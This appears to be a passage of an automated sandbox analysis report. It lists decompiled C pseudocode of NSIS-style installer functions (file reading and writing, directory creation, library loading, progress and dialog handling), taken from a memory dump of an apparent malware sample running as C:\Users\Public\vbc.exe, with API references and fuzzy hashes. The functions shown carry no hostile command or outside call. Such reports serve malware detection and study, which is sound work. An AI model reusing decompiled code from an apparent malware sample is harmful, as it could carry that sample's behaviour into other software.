0x00403315
0x0040331c
0x00000000
0x00000000
0x00403322
0x00403328
0x0040332e
0x00000000
0x00403334
0x0040333a
0x00403344
0x0040335a
0x0040335f
0x00403364
0x0040336a
0x00403370
0x0040337a
0x00403381
0x00000000
0x00000000
0x00403383
0x00403389
0x0040338b
0x004033ae
0x004033b4
0x00000000
0x00000000
0x004033b6
0x004033b8
0x00000000
0x00000000
0x004033ba
0x004033ba
0x004033cd
0x00000000
0x00000000
0x004033dc
0x00000000
0x004033dc
0x00403395
0x0040339c
0x004033e9
0x004033ef
0x004033ef
0x00000000
0x004033ef
0x0040339e
0x004033a4
0x004033aa
0x00000000
0x00000000
0x00000000
0x004033ed
0x004033ed
0x00000000
0x004033ed
0x00000000

APIs

GetTickCount.KERNEL32(00000000,00000000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004032AE

Part of subcall function 00403419: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403117,?), ref: 00403427

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004032E1
SetFilePointer.KERNEL32(0008904F,00000000,00000000,004138F8,00004000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000), ref: 004033DC

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: 10914339fb078c172392a439e9ed0b3db4c7f76b37a754b5eca90989c3c04b63
Instruction ID: 9f56c4e15643f9c800c1675ca7a95df02ba07fd451ae32c2dc2afdd0933238d4
Opcode Fuzzy Hash: 10914339fb078c172392a439e9ed0b3db4c7f76b37a754b5eca90989c3c04b63
Instruction Fuzzy Hash: E6317A72500216DFD710BF2AEE8496A3BACE740356324C13BE914B22F0CB3899469B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00403192, Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00403192(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x4247b8;
					 *0x41f8fc = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E0040329A(4);
				if(_t22 >= 0) {
					_t24 = E00405E39( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x41f8fc =  *0x41f8fc + 4;
						_t36 = E0040329A(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x41f8fc =  *0x41f8fc + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E00405E39( *0x40a01c, 0x4138f8, _t28) == 0) {
											goto L18;
										}
										_t30 = E00405E68(_a8, 0x4138f8, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x41f8fc =  *0x41f8fc + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x00403196
0x0040319f
0x004031a8
0x004031ac
0x004031b7
0x004031b7
0x004031bf
0x004031c6
0x004031d8
0x004031df
0x00403284
0x00403284
0x00000000
0x004031e5
0x004031e8
0x004031f4
0x004031f8
0x00403292
0x00403292
0x004031fe
0x00403201
0x00403260
0x00403266
0x00403268
0x00403268
0x0040327a
0x00403282
0x00403289
0x0040328c
0x00000000
0x00000000
0x00000000
0x00000000
0x00403203
0x00403206
0x00000000
0x0040320c
0x00403211
0x00403218
0x0040321b
0x0040321d
0x0040321d
0x0040322a
0x00403234
0x00000000
0x00000000
0x0040323d
0x00403244
0x0040325c
0x00403286
0x00403286
0x00403246
0x00403246
0x00403249
0x0040324c
0x00403252
0x00403258
0x00000000
0x0040325a
0x00000000
0x0040325a
0x00403258
0x00000000
0x00403244
0x00000000
0x00403211
0x00403206
0x00403201
0x004031f8
0x004031df
0x00403294
0x00403297

APIs

SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004031B7

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 01e98dbf49a9efced9094fa2c3d361a4303186e46b1d46872f44f8f4f7fda8b1
Instruction ID: 417efc13fc3ab0d651ced5ea1d77d103914e3086752ee655c490bf772f36c9c7
Opcode Fuzzy Hash: 01e98dbf49a9efced9094fa2c3d361a4303186e46b1d46872f44f8f4f7fda8b1
Instruction Fuzzy Hash: 6A316D30100319FFDB109F96ED48A9A7FA8EB04359B20847FF914E6190D338DB519BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401389(signed int _a4, struct HWND__* _a11) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x424790;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a11 != 0) {
						 *0x423f2c =  *0x423f2c + _t12;
						SendMessageA(_a11, 0x402, MulDiv( *0x423f2c, 0x7530,  *0x423f14), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32 ref: 004013E4
SendMessageA.USER32 ref: 004013F4

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd8df2336641fef3ba5122bb8ee68c85eddc30aa2a367a6b625e197710042414
Instruction ID: 619251f0f573ab9f47b456b69b18ba8f896b0ae65f75ba169e48b75275ff5987
Opcode Fuzzy Hash: bd8df2336641fef3ba5122bb8ee68c85eddc30aa2a367a6b625e197710042414
Instruction Fuzzy Hash: F301D131B242109BE7194B38AE04B2A36A8E754315F11813AF855F61F1DA78CC129B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00406631, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406631(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a258);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
				}
				_t5 = E004065C3(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406639
0x0040663c
0x00406643
0x0040664b
0x00406657
0x00000000
0x0040665e
0x0040664e
0x00406655
0x00000000
0x00406666
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
GetProcAddress.KERNEL32(00000000,?,?,?,004034D4,0000000B), ref: 0040665E

Part of subcall function 004065C3: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065DA
Part of subcall function 004065C3: wsprintfA.USER32 ref: 00406613
Part of subcall function 004065C3: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406627

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
Instruction ID: e63780c8bf1f0faf28ba6c6d4be53ddd5ff0707a9bdd482d1e4d5d99537df4e3
Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
Instruction Fuzzy Hash: 94E086326042106AD6106B70AE04C7773A89F84750702483EF546F2150D7399C3596AD

Uniqueness

Uniqueness Score: -1.00%

Function 00405DC1, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405DC1(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405dc5
0x00405dd2
0x00405de7
0x00405ded

APIs

GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405DC5
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
Instruction ID: c1cd633b288b309c16b37b55694bd397a2d2f3fd27c3ea135bedd35eac3c4d3c
Opcode Fuzzy Hash: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
Instruction Fuzzy Hash: D9D09E31254602AFEF0D8F20DE16F2E7AA2EB84B00F11952CB682944E2DA715819AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00405D9C, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D9C(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405da1
0x00405da7
0x00405dac
0x00405db5
0x00405db5
0x00405dbe

APIs

GetFileAttributesA.KERNELBASE(?,?,004059B4,?,?,00000000,00405B97,?,?,?,?), ref: 00405DA1
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DB5

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction ID: 45e1b313f31d266de6e0d804bcdac0c4d644dd7a0ef1fc7463663643c81ebfd1
Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction Fuzzy Hash: F9D0A932000021ABD2002728EE0C88BBB91DB00270702CA36FCA4A22B2DB300C129A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405892, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405892(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405898
0x004058a0
0x00000000
0x004058a6
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00403454,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405898
GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058A6

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
Instruction ID: ae32aa403121d558109e23f4dadc85ee7ba81b7b8263ff8d49f56a55f4155d83
Opcode Fuzzy Hash: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
Instruction Fuzzy Hash: D5C04C316045019BE6506B319F08B1B7A549F50741F158439A78AE41E4DA388465D92D

Uniqueness

Uniqueness Score: -1.00%

Function 00405E68, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E68(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e6c
0x00405e7c
0x00405e84
0x00000000
0x00405e8b
0x00000000
0x00405e8d

APIs

WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000), ref: 00405E7C

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 83138c6b6f61fe56512c00d99342466dd547819508ce818909ec7b1084a3bb5f
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: 48E0463221021AABDF109F60CC04AAB3B6CEB00260F404432FAA4E2140E234E9208AE4

Uniqueness

Uniqueness Score: -1.00%

Function 00405E39, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E39(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e3d
0x00405e4d
0x00405e55
0x00000000
0x00405e5c
0x00000000
0x00405e5e

APIs

ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000), ref: 00405E4D

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
Instruction ID: cce2834e44819e2e6951819013f8ba23c93adc22c6858a83ce884f24d90f4801
Opcode Fuzzy Hash: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
Instruction Fuzzy Hash: BFE0463220061AABCF119F60CC00AEB3B6CEB046E0F044832B955E2040D230EA209BE8

Uniqueness

Uniqueness Score: -1.00%

Function 00403419, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403419(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403427
0x0040342d

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403117,?), ref: 00403427

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040548D, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040548D(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x423f24; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405421, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004062BB(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x420d50;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x423f0c - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x424748, 8);
							__eflags =  *0x4247ec - _t150;
							if( *0x4247ec == _t150) {
								E0040534F( *((intOrPtr*)( *0x420528 + 0x34)), _t150);
							}
							E00404285(1);
							goto L25;
						}
						 *0x420120 = 2;
						E00404285(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404313(_t157, _a12, _a16);
						}
						ShowWindow( *0x423f10, _t150);
						ShowWindow(_v8, 8);
						E004042E1(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x424754;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x423f10 = GetDlgItem(_a4, 0x403);
				 *0x423f08 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x423f24 = _t128;
				_v8 = _t128;
				E004042E1( *0x423f10);
				 *0x423f14 = E00404BD2(4);
				 *0x423f2c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042AC(_a4);
				if(( *0x42475c & 0x00000003) != 0) {
					ShowWindow( *0x423f10, _t150);
					if(( *0x42475c & 0x00000002) != 0) {
						 *0x423f10 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E004042E1( *0x423f08);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42475c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}

0x00405493
0x0040549b
0x0040549e
0x004054a6
0x004054a9
0x00405638
0x0040563e
0x00405662
0x00405662
0x0040566e
0x00405674
0x00405696
0x00405696
0x0040569c
0x004056f1
0x004056f1
0x004056f4
0x00000000
0x00000000
0x004056f6
0x004056f9
0x004056fc
0x00000000
0x00000000
0x00405706
0x0040570c
0x0040570e
0x00405711
0x0040580e
0x00000000
0x0040580e
0x00405720
0x0040572c
0x00405735
0x0040573c
0x00405740
0x00405743
0x0040574c
0x00405752
0x00405755
0x00405755
0x00405765
0x0040576b
0x0040576e
0x00405779
0x00405779
0x0040577a
0x0040577d
0x00405784
0x0040578b
0x00405793
0x00405793
0x004057a1
0x004057a7
0x004057aa
0x004057aa
0x004057b1
0x004057b7
0x004057c0
0x004057c7
0x004057d0
0x004057d2
0x004057d5
0x004057e4
0x004057e6
0x004057e9
0x004057ea
0x004057ed
0x004057ee
0x004057ef
0x004057ef
0x004057f7
0x00405802
0x00405808
0x00405808
0x00000000
0x0040576e
0x0040569e
0x004056a4
0x004056d2
0x004056d4
0x004056da
0x004056e5
0x004056e5
0x004056ec
0x00000000
0x004056ec
0x004056a8
0x004056b2
0x00000000
0x00405676
0x00405676
0x0040567c
0x004056b7
0x00000000
0x004056be
0x00405685
0x0040568c
